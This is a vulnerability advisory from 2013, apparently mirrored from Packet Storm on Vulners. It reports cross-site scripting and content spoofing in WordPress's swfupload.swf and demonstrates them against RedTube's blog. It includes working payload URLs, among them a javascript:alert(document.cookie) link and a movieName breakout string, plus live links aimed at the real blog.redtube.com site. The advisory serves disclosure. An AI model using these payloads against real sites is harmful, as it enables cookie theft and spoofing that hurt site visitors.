Vulners
Lucene search
Redtube Blog Cross Site Scripting
🗓️ 07 Jun 2013 00:00:00Reported by Ryuzaki LawletType 
packetstorm🔗 packetstormsecurity.com👁 29 Views
`#########################################################
# Title : Cross Site Scripting in RedTube Official Blog.
# Author : Ryuzaki Lawlet
# Blog : justryuz.blogspot.com / www.justryuz.com
# E-mail : [email protected] / [email protected] / [email protected]
# Date: June 6/2013 (4.44 pm)
# Vendor: http://wordpress.org/plugins/nextgen-gallery/
# Type : Web Apps
# Vector of operation: Remote
# Impact: Cross Site Scripting & Content Spoofing
# Tested on : Ubuntu / Window XP
##########################################################
*Description:
The vulnerability is caused due to insufficient input validation in the parameter
“movieName” and "buttonText" in the script to swfupload.swf “ExternalInterface.call ()”. This can be
exploited to execute arbitrary HTML and script code in a user’s browser session in
context of an affected site.
There are two vulnerabilities in RedTube Official Blog.
*Content Spoofing
http://[victim]/Wordpress/wp-includes/js/swfupload/swfupload.swf?buttonText=test<img src='http://i.imgur.com/ltp2L8N.jpg'>
It's possible to inject text, images and html (e.g. for link injection).
*Cross-Site Scripting
http://[victim]/Wordpress/wp-includes/js/swfupload/swfupload.swf?buttonText=<a href='javascript:alert(document.cookie)'>Click me</a>
or
http://[victim]/Wordpress/wp-includes/js/swfupload/swfupload.swf?movieName="]);}catch(e){}if(!self.a)self.a=!alert("xss");//
Code will execute after click. It's strictly social XSS.
*Proof of Concept Code
http://[victim]/Wordpress/wp-includes/js/swfupload/swfupload.swf?movieName=[XSS]
http://[victim]/Wordpress/wp-includes/js/swfupload/swfupload.swf?buttonText=testbuttonText=test<img src='http://i.imgur.com/ltp2L8N.jpg'>
*Live Preview
http://blog.redtube.com/wp-includes/js/swfupload/swfupload.swf?movieName="]);}catch(e){}if(!self.a)self.a=!alert("xss");//
http://blog.redtube.com/wp-includes/js/swfupload/swfupload.swf?buttonText=<a href='javascript:alert(document.cookie)'>Click me</a>
http://blog.redtube.com/wp-includes/js/swfupload/swfupload.swf?buttonText=test<img src='http://i.imgur.com/ltp2L8N.jpg'>
*Screenshot
https://fbcdn-sphotos-b-a.akamaihd.net/hphotos-ak-ash4/182547_425615577534257_1920413802_n.jpg
*Solution:
On the server side, you can upgrade to a non-vulnerable version. Onthe client
you can use a browser that obeys the Content-Type header specified by the server, such as Mozilla Firefox, Google Chrome, Apple Safari or Opera.
Internet Explorer 8 with the XSS Filter won't execute the malicious scripts.
Reff: http://justryuz.blogspot.com/2013/05/title-cross-site-scripting-in-redtube.html
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
07 Jun 2013 00:00Current
7.4High risk
Vulners AI Score7.4